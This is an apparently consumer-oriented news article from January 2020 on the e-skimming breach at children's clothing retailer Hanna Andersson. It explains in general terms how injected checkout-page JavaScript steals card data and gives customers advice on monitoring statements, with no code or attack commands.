Hackers Used an E-Skimmer on HannaAndersson.com to Collect Sensitive Data, and Now It's Sold Online

Hanna Andersson Data Breach

Sometimes, cybercriminals want to make their presence known. In a ransomware attack, for example, you learn that something's wrong as soon as your files become unusable, and your screen displays the ransom note. In other cases, however, the attacks are silent and remain unnoticed for months. Children clothes retailer HannaAndersson.com, for example, was first hit by an e-skimmer attack in mid-September 2019, but it wasn't until December 5 that the company learned about the problem after law enforcement agencies told it that some of its customers' credit card details were traded on the underground markets. As for the said customers, they had no idea about the incident until earlier this month when Hanna Andersson finally sent out the data breach notifications.

In this particular case, the hackers were more than happy to remain under the radar because stealth is a key factor in any e-skimming operation.

What is an e-skimmer?

Some cybersecurity terms are more descriptive than others, and we reckon that "e-skimming" is fairly easy to understand. We're pretty sure that most of you are familiar with the concept of physical schemers that steal people's banking card details at ATMs and POS terminals. E-skimmers work in a similar way on online shops.

Usually, e-skimmers consist of several lines of JavaScript code that are injected on a website's checkout page. This code scrapes all the payment information users enter and sends it to the crooks. The criminals are interested in the most sensitive data – the card number, the cardholder name, the expiration date, the CVV code, and, in the case of Hanna Andersson, the shipping and billing addresses. In a well-executed attack, the retailer and the customer remain none the wiser, which means that the campaign can resume for a prolonged period of time.

Over the last few years, the popularity of e-skimmers has exploded. These tools are used by numerous cybercriminals with different skillsets and levels of sophistication. Not that long ago, the word Magecart was coined, which is now used as a common term for the many different versions of an e-skimmer used by numerous hacking groups spread all around the world. Currently, most cybersecurity experts agree that Magecart is one of the most formidable threats we're faced with.

Was Hanna Andersson hit by Magecart?

Plenty of news outlets have jumped to the conclusion that Hanna Andersson is just the next in a long line of Magecart victims, but the truth is, the word "Magecart" is nowhere to be found in the retailer's official announcement. In fact, if the notification is anything to go by, the incident didn't actually happen at Hanna Andersson.

The message reads that the malware actually affected Salesforce Cloud – the CRM platform used by Hanna Andersson. Potentially, this is bad news because Salesforce is a large company with plenty of customers. If there really is a problem in Salesforce's systems, the number of affected individuals could be significant.

The CRM service provider hasn't publicly confirmed or denied getting infected with any sort of malware, but a Hanna Andersson spokesperson told CyberScoop that a Salesforce team is helping with the investigation. Cybersecurity experts and representatives of the FBI and the Department of Homeland Security have been dispatched to assist as well, and we hope that we'll soon have more information on what actually happened.

In the meantime, people who bought goods from Hanna Andersson's online shop between September 16 and November 11 (when the malware was deleted) should be especially careful with their bank statements. The data breach notification letter says that not all customers were affected, but just in case, everyone that made a purchase during the aforementioned period is offered a year of identity theft protection and credit monitoring services for free. Those eligible should bear in mind that the enrolment deadline is April 15.

As we mentioned already, this is hardly the first attack of this sort, and you can be pretty sure that it won't be the last. Quite a few major online retailers have been hit, and it's safe to say that no online shop, no matter how big and popular it is, is safe. This means that even if you haven't received Hanna Andersson's data breach alert, you should still regularly check your bank statements for any transactions that you might not recognize.

January 24, 2020

Leave a Reply